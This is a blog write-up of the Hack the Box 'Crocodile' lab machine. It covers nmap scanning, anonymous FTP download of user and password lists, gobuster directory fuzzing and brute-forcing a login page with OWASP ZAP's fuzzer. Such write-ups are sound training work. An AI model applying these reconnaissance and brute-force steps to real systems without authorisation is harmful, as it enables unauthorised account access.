Open in app

Sign in

Write

Sign in

Hack the Box — Crocodile

James Pearson
4 min readAug 19, 2023

HTB Tags: #Linux #PHP #FTP

This is the third box in Tier 1, as part of the Starting Point series, with a focus on directory fuzzing and brute forcing logins on a Linux target. Let’s start by enumerating with the standard commands, ping and nmap.

ping

ping $IP -c 4

nmap

nmap -sC -sV -A $IP -p-

ftp

So we have an open FTP port that accepts anonymous logins. Let’s see what we get.

ftp $IP

Points to note here are the use of ls to list files and mget to download all the files. The [anpqy?]? question means “All, No, Prompt Off, Quit, Yes” for when yo download files. You can use wild cards if required, such as * for all.

Checking out the files we see that they are a list of users and their password.

website

The website looks like any other with, in this case links staying internal to the page.

gobuster

With nothing on the webpages themselves, lets check the folder structures in the URL by directory fuzzing.

gobuster dir -u http://$IP -w /usr/share/wordlists/dirb/common.txt

We find a few interesting folders, especially one called /dashboard. Reviewing this provides us with a login page.

zap

OK we now have found the login page, let’s start up OWSAP ZAP and then using the built in browser, add a username and password.

Needless to say we failed to gain access but have recorded the details within ZAP.

Within ZAP we have the Request and Response tabs. These provide the headers and body of text that goes from client to server.

Here we see the actual html code for the failure:

In order to start the brute force attack, we need to use the internal Fuzz application. Right click within the Request tab and sellect Fuzz:

Firstly remove any active Fuzz locations by clicking Remove from the right side menu. Next we will add the test_user as the first Fuzz location. So highlight and click Add:

This opens up a Payload window. Now click Add and we get the option to select a payload, with a drop down menu for different types.

In this case we know we already have the two files, so find the first user list and then Add.

Now we see the payload we have just added.

Click on OK and then do the same for the password field. We should now be ready to start the Fuzzer.

Similar to Burp Suite, this will not tell you the correct log in, but by filtering the Size Resp.Body, we will see a noticeable difference.

Here we see that the 1258 bytes is different from all the other tasks that were run, indicating that the username:password that we need to use.

Once we sign in, we are given a server manager dashboard, with the flag showing front and centre!!

summary

A great little challenge, which covers brute forcing from ZAP or Burp Suite. If you get some time try out hydra to get the correct password.

Htb Writeup
Htb
Crocodile
Ctf Writeup

--

--

James Pearson

Written by James Pearson

28 Followers

20 + years in an IT environment, working for companies such as Synstar, HP, DXC and Capgemini in a number of different service areas. Now a cyber CTF addict.

Help

Status

About

Careers

Blog

Privacy

Terms

Text to speech

Teams